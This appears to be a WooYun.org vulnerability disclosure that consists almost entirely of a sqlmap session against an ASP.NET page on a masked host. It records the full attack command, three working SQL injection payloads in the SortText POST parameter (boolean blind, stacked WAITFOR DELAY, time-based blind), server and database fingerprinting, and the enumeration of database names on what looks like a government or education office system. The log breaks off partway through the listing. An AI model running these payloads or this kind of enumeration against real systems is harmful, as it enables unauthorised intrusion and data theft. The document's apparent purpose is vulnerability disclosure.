WooYun.org

C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**:8888/MyWork/YinZhang/MyYin
Zhang.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2Fw
EPDwULLTE0OTY3MjczOTYPZBYCAgMPZBYgZg8PZBYCHgdvbmNsaWNrBR1qYXZhc2NyaXB0OnJldHVybi
BzaG93d2FpdCgpO2QCAQ8PZBYCHwAFIGphdmFzY3JpcHQ6cmV0dXJuIHVwZGF0ZWNoZWNrKCk7ZAICDw
9kFgIfAAUgamF2YXNjcmlwdDpyZXR1cm4gdXBkYXRlY2hlY2soKTtkAgMPD2QWAh8ABR1qYXZhc2NyaX
B0OnJldHVybiBkZWxjaGVjaygpO2QCBA8PZBYCHglvbmtleWRvd24FSGlmIChldmVudC5rZXlDb2RlPT
0xMykgeyBkb2N1bWVudC5hbGwuU2VhcmNoRGF0YS5jbGljaygpOyByZXR1cm4gZmFsc2U7fWQCBQ8PZB
YCHwAFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIHDzwrAA0BAA8WBh4IUGFnZVNpemUCMh
4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAICZBYCZg9kFghmDw9kFgQeC29ubW91c2VvdmVyBSNqYX
Zhc2NyaXB0OnNldE1vdXNlT3ZlckNvbG9yKHRoaXMpOx4Kb25tb3VzZW91dAUiamF2YXNjcmlwdDpzZX
RNb3VzZU91dENvbG9yKHRoaXMpO2QCAQ8PZBYEHwUFI2phdmFzY3JpcHQ6c2V0TW91c2VPdmVyQ29sb3
IodGhpcyk7HwYFImphdmFzY3JpcHQ6c2V0TW91c2VPdXRDb2xvcih0aGlzKTsWCGYPZBYEAgMPDxYCHg
RUZXh0BQIyOGRkAgUPDxYCHwcFATFkZAIBD2QWAmYPFQICMjgBMWQCAg8PFgIfBwUG56eB56ugZGQCAw
8PFgIfBwUM562J5b6F5a6h5om5ZGQCAg8PZBYEHwUFI2phdmFzY3JpcHQ6c2V0TW91c2VPdmVyQ29sb3
IodGhpcyk7HwYFImphdmFzY3JpcHQ6c2V0TW91c2VPdXRDb2xvcih0aGlzKTsWCGYPZBYEAgMPDxYCHw
cFAjI3ZGQCBQ8PFgIfBwUG5Y2w56ugZGQCAQ9kFgJmDxUCAjI3BuWNsOeroGQCAg8PFgIfBwUG56eB56
ugZGQCAw8PFgIfBwUG5q2j5bi4ZGQCAw8PFgIeB1Zpc2libGVoZGQCCA8PFgIeC0NvbW1hbmROYW1lBQ
ExFgIfAAUdamF2YXNjcmlwdDpyZXR1cm4gc2hvd3dhaXQoKTtkAgkPDxYCHwkFATEWAh8ABR1qYXZhc2
NyaXB0OnJldHVybiBzaG93d2FpdCgpO2QCCg8PFgIfCQUBMRYCHwAFHWphdmFzY3JpcHQ6cmV0dXJuIH
Nob3d3YWl0KCk7ZAILDw8WAh8JBQExFgIfAAUdamF2YXNjcmlwdDpyZXR1cm4gc2hvd3dhaXQoKTtkAg
0PD2QWAh8ABRxqYXZhc2NyaXB0OnJldHVybiBjaGt5ZW1hKCk7ZAIODxBkZBYBAgNkAg8PDxYCHwcFAT
JkZAIQDw8WAh8HBQExZGQCEQ8PFgIfBwUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZX
lfXxYCBRtHcmlkVmlldzEkY3RsMDIkQ2hlY2tTZWxlY3QFG0dyaWRWaWV3MSRjdGwwMyRDaGVja1NlbG
VjdAUJR3JpZFZpZXcxDzwrAAoBCAIBZJSyaMd0u9CvMa59Zzsg03IZ0vTA&DelData=%C9%BE+%B3%FD
&Name=&GridView1%24ctl02%24CheckSelect=on&GoPage=&DropDownList1=50&SortText=orde
r+by+id+desc"  --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151002}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 08:18:12
[08:18:12] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plea
se, always use only valid parameter values so sqlmap could be able to run proper
ly
[08:18:12] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pl
ease, always use only valid parameter values so sqlmap could be able to run prop
erly
[08:18:12] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please
, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter 'Name' is empty. Please, alway
s use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter 'GoPage' is empty. Please, alw
ays use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [INFO] resuming back-end DBMS 'microsoft sql server'
[08:18:12] [INFO] testing connection to the target URL
[08:18:12] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SortText (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLT
E0OTY3MjczOTYPZBYCAgMPZBYgZg8PZBYCHgdvbmNsaWNrBR1qYXZhc2NyaXB0OnJldHVybiBzaG93d2
FpdCgpO2QCAQ8PZBYCHwAFIGphdmFzY3JpcHQ6cmV0dXJuIHVwZGF0ZWNoZWNrKCk7ZAICDw9kFgIfAA
UgamF2YXNjcmlwdDpyZXR1cm4gdXBkYXRlY2hlY2soKTtkAgMPD2QWAh8ABR1qYXZhc2NyaXB0OnJldH
VybiBkZWxjaGVjaygpO2QCBA8PZBYCHglvbmtleWRvd24FSGlmIChldmVudC5rZXlDb2RlPT0xMykgey
Bkb2N1bWVudC5hbGwuU2VhcmNoRGF0YS5jbGljaygpOyByZXR1cm4gZmFsc2U7fWQCBQ8PZBYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIHDzwrAA0BAA8WBh4IUGFnZVNpemUCDx4LXyFEYX
RhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIIDw8WBB4EVGV4dAUG6aaW6aG1HgtDb21tYW5kTmFtZQUBMR
YCHwAFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIJDw8WBB8FBQbkuIrpobUfBgUBMRYCHw
AFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIKDw8WBB8FBQbkuIvpobUfBgUBMhYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAILDw8WBB8FBQblsL7pobUfBgUBMBYCHwAFHWphdm
FzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAINDw9kFgIfAAUcamF2YXNjcmlwdDpyZXR1cm4gY2hreW
VtYSgpO2QCDg8QZGQWAQIBZAIPDw8WAh8FBQEwZGQCEA8PFgIfBQUBMWRkAhEPDxYCHwUFATBkZBgBBQ
lHcmlkVmlldzEPPCsACgEIZmRWWJvLw U1JI7rjtb1qkh0XIomxQ==&DelData=%C9%BE %B3%FD&Nam
e=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=(SELECT (CAS
E WHEN (9454=9454) THEN 9454 ELSE 9454*(SELECT 9454 FROM master..sysdatabases) E
ND))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLT
E0OTY3MjczOTYPZBYCAgMPZBYgZg8PZBYCHgdvbmNsaWNrBR1qYXZhc2NyaXB0OnJldHVybiBzaG93d2
FpdCgpO2QCAQ8PZBYCHwAFIGphdmFzY3JpcHQ6cmV0dXJuIHVwZGF0ZWNoZWNrKCk7ZAICDw9kFgIfAA
UgamF2YXNjcmlwdDpyZXR1cm4gdXBkYXRlY2hlY2soKTtkAgMPD2QWAh8ABR1qYXZhc2NyaXB0OnJldH
VybiBkZWxjaGVjaygpO2QCBA8PZBYCHglvbmtleWRvd24FSGlmIChldmVudC5rZXlDb2RlPT0xMykgey
Bkb2N1bWVudC5hbGwuU2VhcmNoRGF0YS5jbGljaygpOyByZXR1cm4gZmFsc2U7fWQCBQ8PZBYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIHDzwrAA0BAA8WBh4IUGFnZVNpemUCDx4LXyFEYX
RhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIIDw8WBB4EVGV4dAUG6aaW6aG1HgtDb21tYW5kTmFtZQUBMR
YCHwAFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIJDw8WBB8FBQbkuIrpobUfBgUBMRYCHw
AFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIKDw8WBB8FBQbkuIvpobUfBgUBMhYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAILDw8WBB8FBQblsL7pobUfBgUBMBYCHwAFHWphdm
FzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAINDw9kFgIfAAUcamF2YXNjcmlwdDpyZXR1cm4gY2hreW
VtYSgpO2QCDg8QZGQWAQIBZAIPDw8WAh8FBQEwZGQCEA8PFgIfBQUBMWRkAhEPDxYCHwUFATBkZBgBBQ
lHcmlkVmlldzEPPCsACgEIZmRWWJvLw U1JI7rjtb1qkh0XIomxQ==&DelData=%C9%BE %B3%FD&Nam
e=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=order by id
desc;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLT
E0OTY3MjczOTYPZBYCAgMPZBYgZg8PZBYCHgdvbmNsaWNrBR1qYXZhc2NyaXB0OnJldHVybiBzaG93d2
FpdCgpO2QCAQ8PZBYCHwAFIGphdmFzY3JpcHQ6cmV0dXJuIHVwZGF0ZWNoZWNrKCk7ZAICDw9kFgIfAA
UgamF2YXNjcmlwdDpyZXR1cm4gdXBkYXRlY2hlY2soKTtkAgMPD2QWAh8ABR1qYXZhc2NyaXB0OnJldH
VybiBkZWxjaGVjaygpO2QCBA8PZBYCHglvbmtleWRvd24FSGlmIChldmVudC5rZXlDb2RlPT0xMykgey
Bkb2N1bWVudC5hbGwuU2VhcmNoRGF0YS5jbGljaygpOyByZXR1cm4gZmFsc2U7fWQCBQ8PZBYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIHDzwrAA0BAA8WBh4IUGFnZVNpemUCDx4LXyFEYX
RhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIIDw8WBB4EVGV4dAUG6aaW6aG1HgtDb21tYW5kTmFtZQUBMR
YCHwAFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIJDw8WBB8FBQbkuIrpobUfBgUBMRYCHw
AFHWphdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAIKDw8WBB8FBQbkuIvpobUfBgUBMhYCHwAFHW
phdmFzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAILDw8WBB8FBQblsL7pobUfBgUBMBYCHwAFHWphdm
FzY3JpcHQ6cmV0dXJuIHNob3d3YWl0KCk7ZAINDw9kFgIfAAUcamF2YXNjcmlwdDpyZXR1cm4gY2hreW
VtYSgpO2QCDg8QZGQWAQIBZAIPDw8WAh8FBQEwZGQCEA8PFgIfBQUBMWRkAhEPDxYCHwUFATBkZBgBBQ
lHcmlkVmlldzEPPCsACgEIZmRWWJvLw U1JI7rjtb1qkh0XIomxQ==&DelData=%C9%BE %B3%FD&Nam
e=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=order by id
desc WAITFOR DELAY '0:0:5'
---
[08:18:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[08:18:12] [INFO] fetching database names
[08:18:12] [INFO] fetching number of databases
[08:18:12] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:18:12] [INFO] retrieved:
[08:18:13] [WARNING] reflective value(s) found and filtering out
[08:18:13] [WARNING] time-based comparison requires larger statistical model, pl
ease wait...........................
[08:18:19] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
2
[08:18:37] [INFO] adjusting time delay to 1 second due to good response times
1
[08:18:38] [INFO] retrieved:
[08:18:40] [INFO] retrieved: eduoa
[08:19:08] [INFO] retrieved:
[08:19:10] [INFO] retrieved: eduoa2
[08:19:44] [INFO] retrieved:
[08:19:46] [INFO] retrieved: feibao
[08:20:18] [INFO] retrieved:
[08:20:20] [INFO] retrieved: govoa
[08:20:51] [INFO] retrieved:
[08:20:53] [INFO] retrieved: henan
[08:21:23] [INFO] retrieved:
[08:21:26] [INFO] retrieved: master
[08:22:01] [INFO] retrieved:
[08:22:03] [INFO] retrieved: mod
[08:22:28] [ERROR] invalid character detected. retrying..
[08:22:28] [WARNING] increasing time delay to 2 seconds
el
[08:22:49] [INFO] retrieved:
[08:22:51] [INFO] retrieved: msdb
[08:23:29] [INFO] retrieved:
[08:23:31] [INFO] retrieved:
[08:23:43] [ERROR] invalid character detected. retrying..
[08:23:43] [WARNING] increasing time delay to 3 seconds
neioa
[08:24:48] [INFO] retrieved:
[08:24:50] [INFO] retrieved: newoaa
[08:26:05] [INFO] retrieved:
[08:26:07] [INFO] retrieved: nmoa
[08:27:04] [INFO] retrieved:
[08:27:06] [INFO] retrieved: RDHRDATA_2005
[08:29:41] [INFO] retrieved:
[08:29:43] [INFO] retrieved: Rep